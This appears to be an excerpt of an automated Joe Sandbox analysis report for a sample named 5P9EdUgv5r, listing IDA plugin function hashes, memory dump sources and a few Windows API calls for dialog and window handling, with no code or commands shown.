                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                • Instruction ID: f726aa7bba9ff808f0f2bd6e1fdd34473ddb605fd9b409105fdb66bb6ee09004
                                • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                • Instruction Fuzzy Hash: 3362F5716087469FC719CF28C8805B9BBE1FF55308F18CA6DD9AA87742E730E955CBA0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                • Instruction ID: ea63d88f9444cb57e6b976ae3fd9d6c71142995ffda33a6cb29d3754c43c7eb2
                                • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                • Instruction Fuzzy Hash: 7F523B726087018FC718CF19C891A6AF7E1FFCC314F498A2DE9859B255D734EA19CB86
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc41a1fc6c95f482f536f96e65c42274d6619f7d88c5f693da2215ca6c1be95a
                                • Instruction ID: 678bb9839278bcab6b81b35d84cb3d9abea813beecab87c31aa293114a7238d4
                                • Opcode Fuzzy Hash: bc41a1fc6c95f482f536f96e65c42274d6619f7d88c5f693da2215ca6c1be95a
                                • Instruction Fuzzy Hash: 2012C1B1604B068BC729CF28C9906B9B7E0FF54304F14892EE59BC7A81F774E895CB65
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b5c43bc3a218cddba2359f7acf0209bd7372746a69d24ea2e5d569339ca1fc6
                                • Instruction ID: 468ca1a6fb56c4cdc34fa9661933b9d28c2d8b62a971adaeebb9a6154522a667
                                • Opcode Fuzzy Hash: 8b5c43bc3a218cddba2359f7acf0209bd7372746a69d24ea2e5d569339ca1fc6
                                • Instruction Fuzzy Hash: E8F1B872A183019FC718CF28C480A6ABBE1EFC9314F189A2EF4D5D7356D731E9458B66
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                • Instruction ID: 07f7b2daf14ac1c56ec18d990d43ccbc9b507e900b37e18b8e32e7ed8a7f7632
                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                • Instruction Fuzzy Hash: CBC191362150930ADBAD9639893413FBEA15AA27B131E476DE4B2CB1D4FE20D52CDB30
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                • Instruction ID: 495724cef56a9521877b276c9ce9f33af1ef92b149d1bec7263280a5d1799371
                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                • Instruction Fuzzy Hash: 4FC1B23A2051930ADF6D963A893413FBEA55AA27B131E476DD4B2CB0D4FE20D52DD730
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction ID: 9389eac50049a795bf6f4fe7bb8af66408a656aec7ca4071dcf2839f5a031b51
                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction Fuzzy Hash: A6C171362051930ADFAD963A893403FBEA15EA27B131E476DD4B2CB1D5FE20D568DB30
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: fd8fd53703ffbbeca3cadd7c01651d184e10ee3bc4151d6ea90c7eeeb0ab5d04
                                • Instruction ID: 087d870411c85c13f9d1a8a53ff0eeeb7b84996a26cf0a8eddefa109c07e82b2
                                • Opcode Fuzzy Hash: fd8fd53703ffbbeca3cadd7c01651d184e10ee3bc4151d6ea90c7eeeb0ab5d04
                                • Instruction Fuzzy Hash: 14D1E8B1A047419FDB14CF29C88075BBBE0EF55308F08856DE9889B642F734E959CBB6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction ID: a2f82fc8e0acc32253b289956a69f6cad2248f0b63c7c4395400e64bb1076a0c
                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction Fuzzy Hash: 32C172362051530ADFAD963A893443FBEA15AA27B131E476DD4B3CB1D5FE20D52C9B30
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1428deffa6984c92ec5535c290b8c298f18518b12d82b0f576b648dfde769787
                                • Instruction ID: 5741f5c3696733da38532c265d8bc77c6193aad1722d5b9e5000805485ad7b2c
                                • Opcode Fuzzy Hash: 1428deffa6984c92ec5535c290b8c298f18518b12d82b0f576b648dfde769787
                                • Instruction Fuzzy Hash: 7EE125755183948FC304CF29D89096ABBF0AB8A300F89495EF5D597352C336EA19DBA2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                • Instruction ID: 1e561dbafe7d568d588f799c92c1f2332051568632527608a8de31fc2cda647d
                                • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                • Instruction Fuzzy Hash: 6B9159702047498BDB24EF68C891BBA73D5EB90300F14892DE5DB97282FB75E644E772
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0604bb4a8f23f926a160cfd35d382adfc379e015f8e01dbb5384d125c457e20a
                                • Instruction ID: 761e992651c9bad772a5712114f4be5ee57024c388b36501b70b26f783e20a33
                                • Opcode Fuzzy Hash: 0604bb4a8f23f926a160cfd35d382adfc379e015f8e01dbb5384d125c457e20a
                                • Instruction Fuzzy Hash: 19617B7168070B66DE3CBB689955BBF3388EB41708F1C0A1EE482DF281D651ED41CB79
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                • Instruction ID: 7b4effc43ac90b89148bca7c8673c8f967c71b35b345baa5445a8e0991a57db8
                                • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                • Instruction Fuzzy Hash: 307109716043454BDB24DE2CC8D1BAD77E5EF90304F14892DF5CE8B282EA74DA85A772
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                • Instruction ID: ea84340925cbfda5f83fcf2874f3ef76a9d02cc8e21e1ec425dcf65d9c2b37e5
                                • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                • Instruction Fuzzy Hash: D6514670600A8757DB38BA688C96BBF67E9DF53740F1C050AE982D7282D715DD4183F6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d65a23461cae5fff06dcc849696fd1175a4bcb9e605ce029d233f7147406de8
                                • Instruction ID: 55827935485201de1601623e6c863c2038d2f6e59799cce5b59b0d4990b68021
                                • Opcode Fuzzy Hash: 5d65a23461cae5fff06dcc849696fd1175a4bcb9e605ce029d233f7147406de8
                                • Instruction Fuzzy Hash: D1816B8261A7E49ECB168F7D3CA42B63FA15733340B1D04AAD4C6C63A7C5768A5CD732
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd10b8fc9c2f00d492befa88c85af2b4b551af793686b60ebea4a6c9efc4ff98
                                • Instruction ID: f8f6ebeff83f92489f511fd59f549a923aaf2d37bd0de760ca642ae1e870f9d2
                                • Opcode Fuzzy Hash: bd10b8fc9c2f00d492befa88c85af2b4b551af793686b60ebea4a6c9efc4ff98
                                • Instruction Fuzzy Hash: 0751BD399093D54FC712CF28918446EBFE1BEDA314F4949AEE4D54B202D2219A4ACBB2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c1227bc1bff9f3f868f5cc2cc592a9f0ffdd4088815146ff8d75b2722076a08d
                                • Instruction ID: f994ac7a3ee8c088cea3d86e93a97271e4516de0f6fcae3a0ab95eb7f3b5a73e
                                • Opcode Fuzzy Hash: c1227bc1bff9f3f868f5cc2cc592a9f0ffdd4088815146ff8d75b2722076a08d
                                • Instruction Fuzzy Hash: 4C512671A087018BC748CF19E48059AF7E1FF88354F058A2EE899A7740DB34E959CB9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                • Instruction ID: ae16ce1cd614ca71722769187c7ade3dcf0d25caa28933dd137fb35797abfe8c
                                • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                • Instruction Fuzzy Hash: 4D31D6B26147468FCB14DF28C85126ABBE0FB95300F14892DE4D9D7742D735EA4ACBB2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f674de958fe111ea427ecd683d52feb57c3047b0d6d51059acc2d6b73229c9f1
                                • Instruction ID: 02df76f528a1aa2d6afbef9a676f342bbc11b593aaf4349d6a992191c5eb7894
                                • Opcode Fuzzy Hash: f674de958fe111ea427ecd683d52feb57c3047b0d6d51059acc2d6b73229c9f1
                                • Instruction Fuzzy Hash: B3218A72A202654BCB48CF2EEC904767751AB8631174A812BFA46CB3D5C535ED65C7B0
                                APIs
                                • _swprintf.LIBCMT ref: 00D6DABE
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                  • Part of subcall function 00D71596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00DA0EE8,00000200,00D6D202,00000000,?,00000050,00DA0EE8), ref: 00D715B3
                                • _strlen.LIBCMT ref: 00D6DADF
                                • SetDlgItemTextW.USER32(?,00D9E154,?), ref: 00D6DB3F
                                • GetWindowRect.USER32(?,?), ref: 00D6DB79
                                • GetClientRect.USER32(?,?), ref: 00D6DB85
                                • GetWindowLongW.USER32(?,000000F0), ref: 00D6DC25
                                • GetWindowRect.USER32(?,?), ref: 00D6DC52
                                • SetWindowTextW.USER32(?,?), ref: 00D6DC95
                                • GetSystemMetrics.USER32(00000008), ref: 00D6DC9D
                                • GetWindow.USER32(?,00000005), ref: 00D6DCA8
                                • GetWindowRect.USER32(00000000,?), ref: 00D6DCD5
                                • GetWindow.USER32(00000000,00000002), ref: 00D6DD47
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                • String ID: $%s:$CAPTION$d
                                • API String ID: 2407758923-2512411981
                                • Opcode ID: 8b21302bb02159ccbd6612d4bd2af0c9393a97de68dbff7ece549c10171c793a
                                • Instruction ID: 4721548384b083f58e088efcb7e420ab923a94d7c7a0a825584c6b57501b261a
                                • Opcode Fuzzy Hash: 8b21302bb02159ccbd6612d4bd2af0c9393a97de68dbff7ece549c10171c793a
                                • Instruction Fuzzy Hash: 9C819171608306AFD710DF68DD85F6BBBE9EB88704F09091DFA85D7250D670E909CB62
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 00D8C277
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE2F
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE41
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE53
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE65
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE77
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE89
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE9B
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEAD
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEBF
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BED1
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEE3
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEF5
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BF07
                                • _free.LIBCMT ref: 00D8C26C
